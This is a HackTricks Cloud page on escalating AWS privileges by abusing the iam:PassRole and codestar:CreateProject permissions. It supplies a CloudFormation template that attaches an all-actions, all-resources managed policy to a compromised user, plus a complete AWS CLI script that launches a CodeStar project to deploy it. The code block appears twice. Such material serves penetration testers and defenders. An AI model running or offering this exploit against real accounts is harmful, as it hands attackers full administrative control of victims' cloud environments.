iam:PassRole, codestar:CreateProject

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

With these permissions you can abuse a codestar IAM Role to perform arbitrary actions through a cloudformation template.

To exploit this you need to create a S3 bucket that is accessible from the attacked account. Upload a file called toolchain.json . This file should contain the cloudformation template exploit. The following one can be used to set a managed policy to a user under your control and give it admin permissions:

toolchain.json

{
    "Resources": {
        "supercodestar": {
            "Type": "AWS::IAM::ManagedPolicy",
            "Properties": {
                "ManagedPolicyName": "CodeStar_supercodestar",
                "PolicyDocument": {
                    "Version": "2012-10-17",
                    "Statement": [
                        {
                            "Effect": "Allow",
                            "Action": "*",
                            "Resource": "*"
                        }
                    ]
                },
                "Users": [
                    "<compromised username>"
                ]
            }
        }
    }
}

Also upload this empty zip file to the bucket:

Remember that the bucket with both files must be accessible by the victim account.

With both things uploaded you can now proceed to the exploitation creating a codestar project:

PROJECT_NAME="supercodestar"

# Crecte the source JSON
## In this JSON the bucket and key (path) to the empry.zip file is used
SOURCE_CODE_PATH="/tmp/surce_code.json"
SOURCE_CODE="[
    {
        \"source\": {
            \"s3\": {
                \"bucketName\": \"privesc\",
                \"bucketKey\": \"empty.zip\"
            }
    },
        \"destination\": {
            \"codeCommit\": {
                \"name\": \"$PROJECT_NAME\"
            }
        }
    }
]"
printf "$SOURCE_CODE" > $SOURCE_CODE_PATH

# Create the toolchain JSON
## In this JSON the bucket and key (path) to the toolchain.json file is used
TOOLCHAIN_PATH="/tmp/tool_chain.json"
TOOLCHAIN="{
    \"source\": {
        \"s3\": {
            \"bucketName\": \"privesc\",
            \"bucketKey\": \"toolchain.json\"
        }
    },
    \"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\"
}"
printf "$TOOLCHAIN" > $TOOLCHAIN_PATH

# Create the codestar project that will use the cloudformation epxloit to privesc
aws codestar create-project \
    --name $PROJECT_NAME \
    --id $PROJECT_NAME \
    --source-code file://$SOURCE_CODE_PATH \
    --toolchain file://$TOOLCHAIN_PATH

This exploit is based on the Pacu exploit of these privileges: https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997 On it you can find a variation to create an admin managed policy for a role instead of to a user.

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Previouscodestar:CreateProject, codestar:AssociateTeamMember NextAWS - Cloudformation Privesc

Last updated 4 months ago

{ "Resources": { "supercodestar": { "Type": "AWS::IAM::ManagedPolicy", "Properties": { "ManagedPolicyName": "CodeStar_supercodestar", "PolicyDocument": { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": "*", "Resource": "*" } ] }, "Users": [ "<compromised username>" ] } } } }

PROJECT_NAME="supercodestar" # Crecte the source JSON ## In this JSON the bucket and key (path) to the empry.zip file is used SOURCE_CODE_PATH="/tmp/surce_code.json" SOURCE_CODE="[ { \"source\": { \"s3\": { \"bucketName\": \"privesc\", \"bucketKey\": \"empty.zip\" } }, \"destination\": { \"codeCommit\": { \"name\": \"$PROJECT_NAME\" } } } ]" printf "$SOURCE_CODE" > $SOURCE_CODE_PATH # Create the toolchain JSON ## In this JSON the bucket and key (path) to the toolchain.json file is used TOOLCHAIN_PATH="/tmp/tool_chain.json" TOOLCHAIN="{ \"source\": { \"s3\": { \"bucketName\": \"privesc\", \"bucketKey\": \"toolchain.json\" } }, \"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\" }" printf "$TOOLCHAIN" > $TOOLCHAIN_PATH # Create the codestar project that will use the cloudformation epxloit to privesc aws codestar create-project \ --name $PROJECT_NAME \ --id $PROJECT_NAME \ --source-code file://$SOURCE_CODE_PATH \ --toolchain file://$TOOLCHAIN_PATH